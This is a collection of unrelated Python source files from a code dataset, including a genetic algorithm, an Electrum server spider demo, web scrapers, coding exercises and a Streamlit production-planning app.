{GeneticAlgorithm.SINGLE_POINT_CROSSOVER:\n self.do_crossover_single_point,\n GeneticAlgorithm.TWO_POINT_CROSSOVER:\n self.do_crossover_two_point,\n GeneticAlgorithm.CUT_SLICE_CROSSOVER:\n self.do_crossover_cut_slice,\n GeneticAlgorithm.UNIFORM_CROSSOVER:\n self.do_crossover_uniform}\n\n # Cross Over functions\n def do_crossover_single_point(self, genom1, genom2):\n c = random.randint(1, self.gs.size() - 2)\n return list(genom1[:c]) + list(genom2[c:-1]) + [0.0]\n\n def do_crossover_two_point(self, genom1, genom2):\n if self.gs.size() <= 3:\n return list(genom1[1]) + list(genom2[2]) + list(genom1[3]) + [0.0]\n\n c1 = random.randint(0, self.gs.size() - 2)\n c2 = random.randint(c1, self.gs.size() - 1)\n return list(genom1[:c1]) + list(genom2[c1:c2]) + list(genom1[c2:-1]) \\\n + [0.0]\n\n def do_crossover_cut_slice(self, genom1, genom2):\n c1 = random.randrange(0, self.gs.size() - 1)\n c2 = random.randrange(0, self.gs.size() - 1)\n g = list(genom1[:c1]) + list(genom2[c2:])\n g = g[:self.gs.size()]\n print(len(g), g)\n if len(g) < self.gs.size():\n g += self.gs.random_genom()[len(g):]\n\n return g + [0.0]\n\n def do_crossover_uniform(self, genom1, genom2):\n g = []\n for i in range(self.gs.size()):\n if random.randint(0, 1) == 1:\n g.append(genom1[i])\n else:\n g.append(genom2[i])\n\n return g + [0.0]\n\n def do_crossover(self, type, genom1, genom2):\n return self.CROSSOVER_FUNCTIONS[type](genom1, genom2)\n\n # Run the GA Algorithem\n def init_generation(self, init_population_size):\n self.logger.info('init_generation is started running')\n\n p = []\n counter = 0\n while counter < init_population_size:\n d = self.gs.random_genom() + [0.0]\n if d not in p:\n p.append(d)\n counter += 1\n\n population = np.array(p, dtype=np.float64)\n\n self.logger.info('initialize the genration with the size of {}'.\n format(len(population)))\n\n return population\n\n def init_ga(self, init_population_size, path=None):\n if path is not None:\n self.gs = GenomStruct(path)\n\n return self.init_generation(init_population_size)\n\n def evaluate_fitness_partial(population, fitness, log_level):\n logger = logging.getLogger(GeneticAlgorithm.LOGGER_HANDLER_NAME)\n log_level = log_level\n logger.info('Start evaluating the partial fitness function ' +\n 'for population (size = {})'.format(len(population)))\n\n for g in population:\n g[-1] = fitness(g)\n return population\n\n def evaluate_fitness(self, population, fitness, cuncurrency=1):\n self.logger.info('Start evaluating the fitness function')\n sub_p = np.array_split(population, cuncurrency)\n pool = mp.Pool(processes=cuncurrency)\n results = [pool.apply_async(GeneticAlgorithm.evaluate_fitness_partial,\n args=(sub_p[i], fitness, self.log_level))\n for i in range(cuncurrency)]\n\n output = [p.get() for p in results]\n pool.close()\n\n self.logger.info('Finish evaluating the fitness function')\n\n return np.concatenate(output)\n\n def check_stop_condition(self, population, num_iteratitions, iteratition,\n fitness_goal, reverse_fitness_order):\n self.logger.info('Check stop Condition iterestion ' +\n '{}'.format(iteratition))\n\n if iteratition > num_iteratitions:\n self.logger.info('Stop Condition: True. iteratitions>' +\n 'num_iteratitions({}>{})'.format(num_iteratitions,\n iteratition))\n return False\n\n if population[0, -1] < fitness_goal and \\\n reverse_fitness_order is False:\n self.logger.info('Stop Condition: True. Satisfied Fitness_goal!' +\n 'population[0, -1] < fitness_goal' +\n '({}<{})'.format(population[0, -1], fitness_goal))\n return False\n\n if population[0, -1] > fitness_goal and \\\n reverse_fitness_order is True:\n self.logger.info('Stop Condition: True. Satisfied Fitness_goal!' +\n 'population[0, -1] > fitness_goal' +\n '({}>{})'.format(population[0, -1], fitness_goal))\n return False\n\n return True\n\n def choose_best_population(self, population, population_size,\n reverse=False):\n if reverse is True:\n return population[(-population[:, -1]).argsort()][:population_size]\n return population[population[:, -1].argsort()][:population_size]\n\n def tournament_selection(self, population):\n g = random.choice(population)\n\n for i in range(GeneticAlgorithm.TOURNAMENT_SIZE):\n g1 = random.choice(population)\n if g1[-1] > g[-1]:\n g = g1\n\n return g\n\n def do_mutate(self, g):\n i = random.choice(self.gs.rand_c_options())\n g[i] = self.gs.rand(i)\n return g\n\n def gen_next_generation(self, population, population_size, mutation_rate,\n crossover_type, fitness_func, fitness_goal,\n cuncurrency=1):\n self.logger.info('Generate the next generation')\n\n new_p = []\n while len(new_p) != population_size:\n parent1 = self.tournament_selection(population)\n parent2 = self.tournament_selection(population)\n\n child = self.do_crossover(crossover_type, parent1, parent2)\n if random.uniform(0, 1) < mutation_rate:\n child = self.do_mutate(child)\n\n if child not in new_p:\n new_p.append(child)\n\n new_population = np.array(new_p, dtype=np.float64)\n new_population = self.evaluate_fitness(new_population, fitness_func,\n cuncurrency)\n return new_population\n\n def reload_np_population(self, population, population_size,\n population_np_path, reload_np_population_rate):\n if os.path.isfile(population_np_path) is not True:\n return population\n\n p = np.load(population_np_path)\n n = min(int(reload_np_population_rate * population_size), len(p))\n self.logger.info('reload_np_population ' +\n 'file \"{}\", '.format(population_np_path) +\n 'rate = {}, '.format(reload_np_population_rate) +\n ', count = {}'.format(n))\n\n return np.concatenate((population, p[:n]), axis=0)\n\n def run(self, init_population_size, population_size,\n mutation_rate, num_iteratitions, crossover_type,\n fitness_func, fitness_goal,\n cuncurrency=1, reverse_fitness_order=False, path=None,\n population_np_path=None, reload_np_population_rate=0.1):\n\n iteratition = 1\n population = self.init_ga(init_population_size, path)\n\n if population_np_path is not None:\n population = self.reload_np_population(population,\n population_size,\n population_np_path,\n reload_np_population_rate)\n\n population = self.evaluate_fitness(population, fitness_func,\n cuncurrency)\n\n population = self.choose_best_population(population,\n population_size,\n reverse_fitness_order)\n\n while self.check_stop_condition(population, num_iteratitions,\n iteratition, fitness_goal,\n reverse_fitness_order):\n self.logger.info('start iteration \"{}\" '.format(iteratition))\n\n new_population = self.gen_next_generation(population,\n population_size,\n mutation_rate,\n crossover_type,\n fitness_func,\n fitness_goal,\n cuncurrency)\n\n population = np.concatenate((population, new_population), axis=0)\n population = self.choose_best_population(population,\n population_size,\n reverse_fitness_order)\n iteratition += 1\n self.logger.info('population[:3].astype(float) : ' +\n '{}'.format(population[:3].astype(float)))\n self.logger.info('fitness_value,{},{}'\n .format(iteratition, ','.join(population[:, -1]\n .astype(str))))\n\n return population\n","repo_name":"rafaie/genetic_algorithm","sub_path":"genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":10480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12324303537","text":"from yowsup.structs import ProtocolEntity, ProtocolTreeNode\nfrom .notification_picture import PictureNotificationProtocolEntity\nclass SetPictureNotificationProtocolEntity(PictureNotificationProtocolEntity):\n '''\n \n \n \n \n '''\n\n def __init__(self, _id, _from, status, timestamp, notify, offline, setJid, setId):\n super(SetPictureNotificationProtocolEntity, self).__init__(_id, _from, timestamp, notify, offline)\n self.setData(setJid, setId)\n\n def setData(self, setJid, setId):\n self.setId = setId\n self.setJid = setJid\n \n def toProtocolTreeNode(self):\n node = super(SetPictureNotificationProtocolEntity, self).toProtocolTreeNode()\n setNode = ProtocolTreeNode(\"set\", {\"jid\": self.setJid, \"id\": self.setId}, None, None)\n node.addChild(setNode)\n return node\n\n @staticmethod\n def fromProtocolTreeNode(node):\n entity = PictureNotificationProtocolEntity.fromProtocolTreeNode(node)\n entity.__class__ = SetPictureNotificationProtocolEntity\n setNode = node.getChild(\"set\")\n entity.setData(setNode.getAttributeValue(\"jid\"), setNode.getAttributeValue(\"id\"))\n return entity","repo_name":"tgalal/yowsup","sub_path":"yowsup/layers/protocol_notifications/protocolentities/notification_picture_set.py","file_name":"notification_picture_set.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":6953,"dataset":"github-code","pt":"52"} +{"seq_id":"295460216","text":"#! /usr/bin/env python3\n#\n# Find all Electrum servers, everywhere... It will connect to one at random (from\n# a hard-coded list) and then expand it's list of peers based on what it sees\n# at each server.\n#\n# THIS IS A DEMO PROGRAM ONLY. It would be anti-social to run this frequently or\n# as part of any periodic task.\n#\nimport sys, asyncio, argparse\nfrom connectrum.client import StratumClient\nfrom connectrum.svr_info import KnownServers\n\nks = KnownServers()\n\nconnected = set()\nfailed = set()\n\nasync def probe(svr, proto_code, use_tor):\n conn = StratumClient()\n\n try:\n await conn.connect(svr, proto_code, use_tor=(svr.is_onion or use_tor), short_term=True)\n except:\n failed.add(str(svr))\n return None\n\n peers, _ = conn.subscribe('server.peers.subscribe')\n\n peers = await peers\n print(\"%s gave %d peers\" % (svr, len(peers)))\n\n connected.add(str(svr))\n\n # track them all.\n more = ks.add_peer_response(peers)\n\n if more:\n print(\"found %d more servers from %s: %s\" % (len(more), svr, ', '.join(more)))\n \n\n conn.close()\n\n return str(svr)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Interact with an electrum server')\n\n parser.add_argument('servers', default=[], metavar=\"server_list.json\", nargs='*',\n help='JSON file containing server details')\n parser.add_argument('--protocol', default='t', choices='ts',\n help='Protocol code: t=TCP Cleartext, s=SSL, etc')\n parser.add_argument('--tor', default=False, action=\"store_true\",\n help='Use local Tor proxy to connect (localhost:9150)')\n parser.add_argument('--onion', default=None, action=\"store_true\",\n help='Select only servers operating an .onion name')\n parser.add_argument('--irc', default=False, action=\"store_true\",\n help='Use IRC channel to find servers')\n parser.add_argument('--output', default=None,\n help='File to save resulting server list into (JSON)')\n parser.add_argument('--timeout', default=30, type=int,\n help='Total time to take (overall)')\n\n args = parser.parse_args()\n\n if args.irc:\n print(\"Connecting to freenode #electrum... (slow, be patient)\")\n ks.from_irc()\n\n for a in args.servers:\n ks.from_json(a)\n\n #ks.from_json('../connectrum/servers.json')\n\n if not ks:\n print(\"Please use --irc option or a list of servers in JSON on command line\")\n sys.exit(1)\n\n print(\"%d servers are known to us at start\" % len(ks))\n\n loop = asyncio.get_event_loop() \n\n # cannot reach .onion if not using Tor; so filter them out\n if not args.tor:\n args.onion = False\n\n candidates = ks.select(protocol=args.protocol, is_onion=args.onion)\n print(\"%d servers are right protocol\" % len(candidates))\n\n all_done = asyncio.wait([probe(i, args.protocol, args.tor) for i in candidates],\n timeout=args.timeout)\n\n loop.run_until_complete(all_done)\n loop.close()\n\n if not connected:\n print(\"WARNING: did not successfully connect to any existing servers!\")\n else:\n print(\"%d servers connected and answered correctly\" % len(connected))\n\n if failed:\n print(\"%d FAILURES: \" % len(failed))\n for i in failed:\n print(' %s' % i)\n\n print(\"%d servers are now known\" % len(ks))\n if 0:\n for i in ks.values():\n print(' %s [%s]' % (i.hostname, ' '.join(i.protocols)))\n\n if args.output:\n ks.save_json(args.output)\n \n# EOF\n","repo_name":"coinkite/connectrum","sub_path":"examples/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"52"} +{"seq_id":"14764550491","text":"from constraint import *\n\n\ndef sostanok(simona, marija, petar, sostanoci):\n if simona == 1 and marija == 1 and petar == 0 and sostanoci == 14 \\\n or simona == 1 and marija == 0 and petar == 1 and sostanoci == 19 \\\n or simona == 1 and marija == 0 and petar == 1 and sostanoci == 16 \\\n or simona == 1 and marija == 0 and petar == 1 and sostanoci == 13:\n return True\n else:\n return None\n\n\nif __name__ == '__main__':\n problem = Problem(BacktrackingSolver())\n termini_za_sostanok = [12, 13, 14, 15, 16, 17, 18, 19]\n problem.addVariable(\"Simona_prisustvo\", [0, 1])\n problem.addVariable(\"Marija_prisustvo\", [0, 1])\n problem.addVariable(\"Petar_prisustvo\", [0, 1])\n problem.addVariable(\"vreme_sostanok\", termini_za_sostanok)\n problem.addConstraint(sostanok, [\"Simona_prisustvo\", \"Marija_prisustvo\", \"Petar_prisustvo\", \"vreme_sostanok\"])\n resenie = {\"Simona_prisustvo\": 0, \"Marija_prisustvo\": 0, \"Petar_prisustvo\": 0, \"vreme_sostanok\": 0}\n resenija = problem.getSolutions()\n for res in resenija:\n for key, value in res.items():\n if key == \"Simona_prisustvo\":\n resenie[\"Simona_prisustvo\"] = value\n if key == \"Marija_prisustvo\":\n resenie[\"Marija_prisustvo\"] = value\n if key == \"Petar_prisustvo\":\n resenie[\"Petar_prisustvo\"] = value\n if key == \"vreme_sostanok\":\n resenie[\"vreme_sostanok\"] = value\n print(resenie)","repo_name":"StefBelcev/PythonCourse","sub_path":"exercises/lab02/sostanok_kolegi1.py","file_name":"sostanok_kolegi1.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71276405606","text":"#!/usr/bin/python3\n\"\"\"\nReturns a matrix divided by input value\n\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"\n Divides all elements of matrix and makes a new matrix\n \"\"\"\n if not all(isinstance(row, list) for row in matrix):\n raise TypeError(\"matrix must be a matrix (list of lists)\")\n if not all(isinstance(i, (int,float)) for row in matrix for i in row):\n raise TypeError(\"matrix must be a matrix (list of lists) of integers/floats\")\n if not all(len(row) == len(matrix[0]) for row in matrix):\n raise TypeError(\"Each row of the matrix must have the same size\")\n if not isinstance(div, (int,float)):\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n return [[round(i/div, 2) for i in row] for row in matrix]","repo_name":"DustinDavis02/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4039342862","text":"import boto3\nimport os\nfrom bs4 import BeautifulSoup\nfrom botocore.exceptions import ClientError\n\n\ndef html_to_csv(html):\n soup = BeautifulSoup(html, features='html5lib')\n rows = soup.find_all('tr')\n\n tables_rows = [\n [el.text for el in els] for els in [row.find_all(['p', 'span']) for row in rows[1:]]\n ]\n\n first_10_rows = [','.join([r[2], r[3], r[4]]) for r in tables_rows[:10]]\n\n rest_rows = [','.join([r[3], r[4], r[5]]) for r in tables_rows[10:]]\n\n header = 'name,symbol,price\\n'\n csv = header + '\\n'.join(first_10_rows + rest_rows)\n\n return csv\n\n\ndef get_html_object(bucket, object_key):\n try:\n s3_client = boto3.client('s3')\n html_object = s3_client.get_object(\n Bucket=bucket,\n Key=object_key\n )\n except ClientError as e:\n raise e\n\n return html_object\n\n\ndef handler(event, context):\n html_object_key = event['html_object_key']\n html_object = get_html_object(\n os.environ['RAW_DATA_BUCKET'], html_object_key)\n html_content = html_object['Body'].read()\n\n return {\n 'object_key': html_object_key.replace('.html', '.csv'),\n 'data': html_to_csv(html_content)\n }\n","repo_name":"pharesdiego/aws-crypto-prices-miner","sub_path":"lambdas/transform_coinmarketcap/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27699595632","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution(object):\r\n def linklist_to_str(self,linklst):\r\n str = \"\"\r\n while linklst:\r\n if str == \"\":\r\n str = linklst.val\r\n linklst = linklst.next\r\n else:\r\n str = \"{}{}\".format(linklst.val, str)\r\n linklst = linklst.next\r\n return str\r\n def addTwoNumbers(self, l1, l2):\r\n \"\"\"\r\n :type l1: ListNode = [2,4,3]\r\n :type l2: ListNode = [5,6,4]\r\n :rtype: ListNode\r\n \"\"\"\r\n a = self.linklist_to_str(l1) #a=342\r\n b = self.linklist_to_str(l2) #b=465\r\n c = str(int(a)+int(b)) #c=807\r\n d = c[::-1] #d=708\r\n \r\n self.head = ListNode(d[0])\r\n r = self.head\r\n p = self.head\r\n for i in d[1:]:\r\n node = ListNode(i)\r\n p.next = node\r\n p = p.next\r\n return r\r\n","repo_name":"ChubbyMeg/singel-tool","sub_path":"addTwoNumbers.py","file_name":"addTwoNumbers.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27238640007","text":"import requests\nimport bs4\nfrom fake_useragent import UserAgent\nfrom progress.bar import IncrementalBar\nimport time\n\n\ndef request_html_data(url, urn=None):\n fake_ua = UserAgent()\n headers = {'User-Agent': str(fake_ua.chrome)}\n if urn is None:\n response = requests.get(url, headers=headers)\n else:\n response = requests.get(url+urn, headers=headers)\n\n return response.text\n\n\ndef check_keywords(html_code, keywords, url):\n posts = ''\n soup = bs4.BeautifulSoup(html_code, features='html.parser')\n articles = soup.find_all('article')\n for article in articles:\n text = article.text\n text_list = text.split()\n href = article.find(class_='tm-article-snippet__title-link').attrs['href'][1:]\n link_ = url + href\n for keyword in keywords:\n if keyword in text_list:\n bar.next()\n title = article.find(class_='tm-article-snippet__title tm-article-snippet__title_h2')\n title_text = title.find('span').text\n date_cont = article.find(class_='tm-article-snippet__datetime-published')\n date = date_cont.find('time').attrs['title'][0:10]\n posts += f'\\n-------\\n{date}\\n{title_text}\\n{link_}'\n else:\n bar.next()\n html_data = request_html_data(url, href)\n post_soup = bs4.BeautifulSoup(html_data, features='html.parser')\n post_text = soup.find(class_='article-formatted-body article-formatted-body '\n 'article-formatted-body_version-2').text\n if keyword in post_text:\n title = post_soup.find(class_='tm-article-snippet__title tm-article-snippet__title_h1')\n title_text = title.find('span').text\n date = post_soup.find(class_='tm-article-snippet__datetime-published').find('title')[0:10]\n posts += f'\\n-------\\n{date}\\n{title_text}\\n{link_}'\n\n return posts\n\n\nif __name__ == '__main__':\n KEYWORDS = ['дизайн', 'фото', 'web', 'python']\n URL = 'https://habr.com/ru/all/'\n html_data = request_html_data(URL)\n bar = IncrementalBar('Поиск статей')\n\n bar.start()\n posts_result = check_keywords(html_data, KEYWORDS, URL)\n bar.finish()\n print('Поиск статей завершён!')\n time.sleep(1)\n print(posts_result)\n","repo_name":"Xypmich/hw_web_scraping","sub_path":"scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6044939703","text":"class SonarSweeper:\n def get_input(self):\n \"\"\"\n Reads text file and converts inputs to a list of inputs.\n \"\"\"\n\n input_ = open(\"advent_of_code_2021/inputs/day1.txt\", \"r\")\n input_ = input_.read().strip().split(\"\\n\")\n\n self.input = input_\n\n def find_measurement_increases(self):\n \"\"\"\n Finds the number of times the depth increases from\n a previous measurement.\n \"\"\"\n\n measurement_increase_count = 0\n previous_measurement = 0\n\n for measurement in self.input:\n\n if self.input.index(measurement) > 0:\n measurement = int(measurement)\n\n if measurement > previous_measurement:\n measurement_increase_count += 1\n\n previous_measurement = int(measurement)\n\n self.increase_count = measurement_increase_count\n\n def find_triple_measurement_increases(self):\n \"\"\"\n Finds the amount of times the sum of 3 consecutive measurements\n increases from a previous sum of 3 consecutive measurements.\n \"\"\"\n\n measurement_increase_count = 0\n triple_measurement = []\n previous_triple_measurement_sum = 0\n\n for measurement in self.input:\n\n measurement = int(measurement)\n triple_measurement.append(measurement)\n \n if len(triple_measurement) >= 3:\n\n if sum(triple_measurement) > previous_triple_measurement_sum and previous_triple_measurement_sum != 0:\n measurement_increase_count += 1\n\n previous_triple_measurement_sum = sum(triple_measurement)\n triple_measurement.remove(triple_measurement[0])\n\n self.increase_count = measurement_increase_count\n\n def results(self):\n \"\"\"\n Prints the total amount of increases in the sonar sweepers depth measurements.\n \"\"\"\n\n print(f\"Total increases in depth measurements: {self.increase_count}\")\n\n\ndef main():\n\n \"\"\"Part 1\"\"\"\n # ss = SonarSweeper()\n # ss.get_input()\n # ss.find_measurement_increases()\n # ss.results()\n\n \"\"\"Part 2\"\"\"\n ss = SonarSweeper()\n ss.get_input()\n ss.find_triple_measurement_increases()\n ss.results()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"riobeggs/advent_of_code","sub_path":"advent_of_code_2021/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9873716320","text":"all = set()\nfor s in open('aoc2.txt'):\n\tall.add(s)\n\t\n\tfor b in all:\n\t\tdiffs = 0\n\t\tfor c, d in zip(b, s):\n\t\t\tif c!= d:\n\t\t\t\tdiffs += 1\n\t\tif diffs == 1:\n\t\t\tout = ''\n\t\t\tfor p, q in zip(s,b):\n\t\t\t\tif p==q:\n\t\t\t\t\tout += p\n\t\t\tprint(out)\n\t\t\t","repo_name":"stehal/aoc2018","sub_path":"aoc2_2.py","file_name":"aoc2_2.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30909683101","text":"points = 12\r\n\r\ndef which_prize(points):\r\n\twooden_rabbit = 50\r\n\tno_prize = 150\r\n\twafer_thin = 180\r\n\tpenguin = 200\r\n\tif points <= wooden_rabbit:\r\n\t\tprize = \"wooden rabit\"\r\n\telif points <= no_prize:\r\n\t\tprize = \"No prize\"\r\n\telif points <= wafer_thin:\r\n\t\tprize = \"wafer-thin mint\"\r\n\telif points <= penguin:\r\n\t\tprize = \"penguin\"\r\n\telse:\r\n\t\tprize = \"No prize\"\r\n\tif 51 <= points <= 150:\r\n\t\treturn \"Oh dear, no prize this time.\"\r\n\telse:\r\n\t\treturn \"Congratulations! You have won a \" + prize + \"!\"\r\n\t\r\nprint (which_prize(points))","repo_name":"A3ex1984/hello_world","sub_path":"prize.py","file_name":"prize.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1604758452","text":"import streamlit as st\r\nfrom docplex.mp.model import Model\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport seaborn as sns\r\n\r\nst.write(\"\"\"\r\n# Car Production Planning App\r\n\r\nThis model is an extension of the https://suresh-abeyweera.medium.com/optimization-with-python-docplex-beginners-guide-d54b77ac715d\r\n \\n This demo shows the integration of Streamlit with docplex\r\n\r\n\r\n\"\"\")\r\n\r\n \r\nimage = Image.open('car1.jpg')\r\nst.image(image)\r\n\r\nst.sidebar.header('User Input Values')\r\nst.sidebar.write('Select the parameter values')\r\n\r\nsidebar_expander_demand = st.sidebar.expander(\"Car Demand Values\")\r\nwith sidebar_expander_demand:\r\n \r\n selected_carA_lower_bound = st.slider('Minimum Car A Units', 10, 100,10,key = \"carA_lower_bound\")\r\n selected_carB_lower_bound = st.slider('Minimum Car B Units', 10, 100,10,key = \"carB_lower_bound\")\r\n\r\n \r\nsidebar_expander_profit = st.sidebar.expander(\"Car Profit Values\")\r\nwith sidebar_expander_profit:\r\n \r\n selected_carA_profit = st.slider('Profits by Selling 1 Unit of CarA', 10, 100,12,key = \"carA_profit\")\r\n selected_carB_profit = st.slider('Profits by Selling 1 Unit of CarB', 10, 100,15,key = \"carB_profit\")\r\n\r\n\r\nsidebar_expander_assembly = st.sidebar.expander(\"Assembly Time(Days)\")\r\nwith sidebar_expander_assembly:\r\n \r\n selected_carA_assemble_time = st.slider('Days Spent for Assembling 1 Unit of CarA', 0.1, 0.5,0.5,key = \"carA_assemble_time\")\r\n selected_carB_assemble_time = st.slider('Days Spent for Assembling 1 Unit of CarB', 0.1, 0.5,0.25,key = \"carB_assemble_time\")\r\n\r\nsidebar_expander_paintfinish = st.sidebar.expander(\"Painting and Finishing Time(Days)\")\r\nwith sidebar_expander_paintfinish:\r\n \r\n selected_carA_paint_finish_time = st.slider('Days Spent for Assembling 1 Unit of CarA', 0.1, 0.5,0.15,key = \"carA_paint_finish_time\")\r\n selected_carB_paint_finish_time = st.slider('Days Spent for Painting and Finishing 1 Unit of CarB', 0.1, 0.5,0.1,key = \"carB_paint_finish_time\")\r\n\r\nsidebar_expander_capacity = st.sidebar.expander(\"Capacity Constraints\")\r\nwith sidebar_expander_capacity:\r\n \r\n selected_max_capacity_assemblyline = st.slider('Maximum Capacity for Assembly Line', 10, 100,20,key = \"max_capacity_assemblyline\")\r\n selected_max_capacity_paintfinishline = st.slider('Maximum Capacity for Painting & Finishing Line', 10, 100,10,key = \"max_capacity_paintfinishline\")\r\n\r\nmy_model = Model(name='Car_Production')\r\n\r\nCarA = my_model.integer_var(name='CarA')\r\nCarB = my_model.integer_var(name='CarB')\r\n\r\n\r\n# constraint #1: CarA production is greater than 10\r\nmy_model.add_constraint(CarA >= selected_carA_lower_bound)\r\n\r\n# constraint #2: CarB production is greater than 10\r\nmy_model.add_constraint(CarB >= selected_carB_lower_bound)\r\n\r\nimport pandas as pd\r\nlist_of_lists = []\r\nlist_of_lists.append(['CarA',selected_carA_assemble_time,selected_carA_paint_finish_time,selected_carA_lower_bound,selected_carA_profit])\r\nlist_of_lists.append(['CarB',selected_carB_assemble_time,selected_carB_paint_finish_time,selected_carB_lower_bound,selected_carB_profit])\r\n\r\ndf = pd.DataFrame(list_of_lists, columns=['Car Type', 'Days - assemble', 'Days - paint and finish', 'Minimum Production','Profits'])\r\n\r\nst.subheader('User Input parameters')\r\nst.write(df)\r\n\r\n# constraint #3: Assembly Line has a Maximum Capacity Limitaion\r\nct_assembly = my_model.add_constraint( selected_carA_assemble_time * CarA + selected_carB_assemble_time * CarB <= selected_max_capacity_assemblyline)\r\n\r\n# constraint #4: Painting and Finishing Line has a Maximum Capacity Limitation.\r\nct_painting = my_model.add_constraint( selected_carA_paint_finish_time * CarA + selected_carB_paint_finish_time * CarB <= selected_max_capacity_paintfinishline)\r\n\r\n\r\nmy_model.maximize(selected_carA_profit * 1000* CarA + selected_carB_profit * 1000 * CarB)\r\n\r\n\r\n\r\nif st.button('Solve Model'):\r\n \r\n solution = my_model.solve()\r\n\r\n solve_time = my_model.solve_details.time\r\n solve_status = my_model.solve_details.status\r\n\r\n\r\n\r\n print(solution)\r\n my_model.print_solution()\r\n\r\n st.subheader('Solve Status')\r\n st.write(solve_status)\r\n\r\n st.subheader('Solve Time')\r\n st.write(\"%.5f\" % round(solve_time, 5)+ \" Seconds\")\r\n\r\n if solve_status == \"integer optimal solution\":\r\n st.markdown(\"\"\"
\"\"\", unsafe_allow_html=True)\r\n col1, col2 = st.columns(2)\r\n \r\n carA_solution = solution.get_value(CarA)\r\n carB_solution = solution.get_value(CarB)\r\n \r\n col1.subheader('Car A Production')\r\n col1.write(str(int(carA_solution)) + \" Cars\")\r\n\r\n col2.subheader('Car B Production')\r\n col2.write(str(int(carB_solution))+ \" Cars\")\r\n\r\n\r\n carA_profit_solution = selected_carA_profit * 1000* carA_solution\r\n carB_profit_solution = selected_carB_profit * 1000* carB_solution\r\n \r\n \r\n solution_lists = []\r\n solution_lists.append(['CarA',carA_solution,carA_profit_solution,carA_solution * selected_carA_assemble_time, carA_solution * selected_carA_paint_finish_time])\r\n solution_lists.append(['CarB',carB_solution,carB_profit_solution,carB_solution* selected_carB_assemble_time, carB_solution * selected_carB_paint_finish_time])\r\n\r\n df_solution = pd.DataFrame(solution_lists, columns=[\"Car Type\", \"Number of Cars\", \"Profit\" ,\"Assembly Time\", \"Painting & Finishing Time\"])\r\n st.write(df_solution)\r\n \r\n \r\n col1.subheader('Car A Profit')\r\n col1.write(str(carA_profit_solution)+ \" Dollars\")\r\n\r\n col2.subheader('Car B Profit')\r\n col2.write(str(carB_profit_solution)+ \" Dollars\")\r\n \r\n col1.subheader('Number of Cars')\r\n #col1.bar_chart([carA_solution,carB_solution], width = 1,height=0,use_container_width=True)\r\n \r\n x = ['CarA', 'CarB']\r\n y = [carA_solution, carB_solution]\r\n fig1 = plt.figure(figsize=(10, 8))\r\n sns.barplot(x, y)\r\n col1.pyplot(fig1)\r\n \r\n col2.subheader('Total Profit by Car Type')\r\n labels = 'CarA Profit', 'CarB Profit'\r\n profit_slutions = [carA_profit_solution, carB_profit_solution]\r\n explode = (0, 0.1) \r\n\r\n fig1, ax1 = plt.subplots()\r\n ax1.pie(profit_slutions, explode=explode, labels=labels, autopct='%1.1f%%',\r\n shadow=True, startangle=90)\r\n ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\r\n\r\n col2.pyplot(fig1)\r\n \r\n col1.subheader(\"Capacity Allocation Vs. Usage - Assembling\")\r\n \r\n x = ['Usage', 'Allocation']\r\n y = [sum(df_solution[\"Assembly Time\"]), selected_max_capacity_assemblyline]\r\n fig2 = plt.figure(figsize=(10, 8))\r\n sns.barplot(x, y)\r\n col1.pyplot(fig2)\r\n \r\n col2.subheader('Capacity Allocation Vs. Usage - Painting & Finishing')\r\n \r\n \r\n x = ['Usage', 'Allocation']\r\n y = [sum(df_solution[\"Painting & Finishing Time\"]), selected_max_capacity_paintfinishline]\r\n fig3 = plt.figure(figsize=(10, 8))\r\n sns.barplot(x, y)\r\n col2.pyplot(fig3)\r\n \r\n st.markdown(\"\"\"
